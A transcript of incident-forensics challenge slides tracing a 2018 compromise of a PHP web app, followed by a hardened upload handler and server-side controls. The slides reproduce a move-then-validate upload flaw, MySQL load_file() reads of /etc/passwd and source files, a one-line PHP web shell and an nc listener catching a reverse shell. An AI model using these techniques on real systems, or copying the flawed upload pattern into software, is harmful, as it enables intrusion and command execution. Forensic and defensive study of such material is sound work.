
MBSD Cybersecurity Challenges 2018 Final Judging Presentation Slides

8ayac
December 12, 2018

Presented as Team IPFactory.

Transcript

  1. MBSD Cybersecurity Challenges 2018

  2–9. (image-only slides; no text extracted)

  10. sendmessage.php

    $prefix = md5(time() . $user->id);
    $tname = $prefix . basename($_FILES["file"]["name"]);
    if (move_uploaded_file($_FILES['file']['tmp_name'], "./tmp/".$tname) && preg_match("/^[^.]+\.jpg$/", $tname)) {

  11. sendmessage.php (2018/9/21 14:46:48), MySQL general log:

    180921 14:39:24 26247 Connect root@192.168.11.204 on mysql
    180921 14:41:06 26247 Query select load_file('/etc/hosts')
    180921 14:41:12 26247 Query select load_file('/etc/passwd')
    180921 14:42:30 26247 Query select load_file('/etc/issue')
    180921 14:42:45 26247 Query select load_file('/etc/httpd/conf/httpd.conf')
    180921 14:43:32 26247 Query select load_file('/var/www/html/webmix3/index.php')
    180921 14:44:30 26247 Query select load_file('/var/www/html/webmix3/login.php')
    180921 14:44:54 26247 Query select load_file('/var/www/html/webmix3/libs.php')
    180921 14:45:25 26247 Query select load_file('/var/www/html/webmix3/class/class.php')
    180921 14:45:45 26247 Query select load_file('/var/www/html/webmix3/class/User.php')
    180921 14:46:48 26247 Query select load_file('/var/www/html/webmix3/sendmessage.php')

  12–16. Web Shell (2018/9/21 15:12:46) 192.168.11.2

    Uploaded file: 7449f92ea0f26445e89ae968227efaabtest.php
    <?php system($_POST['cmd']);

    httpd error log:
    [Fri Sep 21 15:14:01 2018] [error] [client 192.168.11.204] PHP Notice: Undefined index: cmd in /var/www/html/webmix3/tmp/7449f92ea0f26445e89ae968227efaabtest.php on line 1
    [Fri Sep 21 15:14:01 2018] [error] [client 192.168.11.204] PHP Warning: system(): Cannot execute a blank command in /var/www/html/webmix3/tmp/7449f92ea0f26445e89ae968227efaabtest.php on line 1

    httpd access log:
    192.168.11.204 - - [21/Sep/2018:15:12:46 +0900] "POST /sendmessage.php HTTP/1.1" 200 1783 "http://192.168.11.2/sendmessage.php" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
    192.168.11.204 - - [21/Sep/2018:15:14:01 +0900] "GET /tmp/7449f92ea0f26445e89ae968227efaabtest.php HTTP/1.1" 200 58 "-" "Mozilla/5.0 (X11; Linux 86_64; rv:52.0) Gecko/20100101 Firefox/52.0"

  17–21. (2018/9/21 15:29:02) 192.168.11.2, listening on 4444/TCP…

    $ nc -lvp 4444
    Listening on [0.0.0.0] (family 0, port 4444)
    Connection from 192.168.11.204 64495 received!
    sh-4.1$

    httpd access log:
    192.168.11.204 - - [21/Sep/2018:15:14:01 +0900] "GET /tmp/7449f92ea0f26445e89ae968227efaabtest.php HTTP/1.1" 200 58 "-" "Mozilla/5.0 (X11; Linux 86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
    192.168.11.204 - - [21/Sep/2018:15:29:02 +0900] "POST /tmp/7449f92ea0f26445e89ae968227efaabtest.php HTTP/1.1" 200 58 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"

  22–35. (image-only slides; no text extracted)
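The upload handler on slide 10 is the root of the web shell on slides 12–16: move_uploaded_file() runs first, and the name is tested against /^[^.]+\.jpg$/ only afterwards, so a file named <md5>test.php is already sitting in ./tmp/ when the check fails. The following is an added example, not code from the challenge or from Team IPFactory, showing a hardened replacement in which every check runs before the file is moved. The function name save_image_upload, the upload directory and the 2 MiB size cap are assumptions; $_FILES['file'] follows the original snippet.

```php
<?php
// Added example (not the challenge's own code): hardened replacement for the
// upload path in sendmessage.php. The original moves the file and only then
// checks the name, so a non-.jpg file reaches disk. Here the file is moved
// only after every check has passed, under a name the server chooses.
// Function name, upload directory and size cap are assumptions.

declare(strict_types=1);

const MAX_UPLOAD_BYTES = 2 * 1024 * 1024; // assumption: 2 MiB cap

/**
 * Store an uploaded JPEG under a server-generated name.
 * Returns the stored path, or null if the upload is rejected for any reason.
 */
function save_image_upload(array $file, string $uploadDir): ?string
{
    // 1. PHP's own verdict on the transfer (partial upload, ini limits, ...).
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        return null;
    }
    // 2. Our own size cap, independent of php.ini.
    if (($file['size'] ?? 0) > MAX_UPLOAD_BYTES) {
        return null;
    }
    // 3. tmp_name must be a file that arrived with this request.
    if (!is_uploaded_file($file['tmp_name'])) {
        return null;
    }
    // 4. Inspect the bytes, not the client-supplied filename: require a JPEG.
    $info = @getimagesize($file['tmp_name']);
    if ($info === false || $info[2] !== IMAGETYPE_JPEG) {
        return null;
    }
    // 5. Server-generated name with a fixed extension. basename($_FILES[..]['name'])
    //    is never reused, so no ".php" suffix can reach disk, and random_bytes()
    //    replaces the guessable md5(time() . $user->id) prefix of the original.
    $target = rtrim($uploadDir, '/') . '/' . bin2hex(random_bytes(16)) . '.jpg';

    // 6. Only now touch the destination directory.
    return move_uploaded_file($file['tmp_name'], $target) ? $target : null;
}

// Usage in place of the original handler:
// $path = save_image_upload($_FILES['file'] ?? [], __DIR__ . '/tmp');
// if ($path === null) { http_response_code(400); exit('invalid image'); }
```

Two server-side controls complement the code change. First, the upload directory should never be served through the PHP engine: with mod_php, `php_admin_flag engine off` inside a `<Directory "/var/www/html/webmix3/tmp">` block in httpd.conf would have returned the uploaded test.php as plain text instead of executing it, and the access log already shows the line to alert on (a POST to /tmp/*.php answered with 200). Second, the MySQL general log on slide 11 shows the attacker connecting as root from their own host and reading the application source with load_file() before crafting the upload; load_file() requires the FILE privilege, so the application's database account should not hold it and root should not accept remote connections at all.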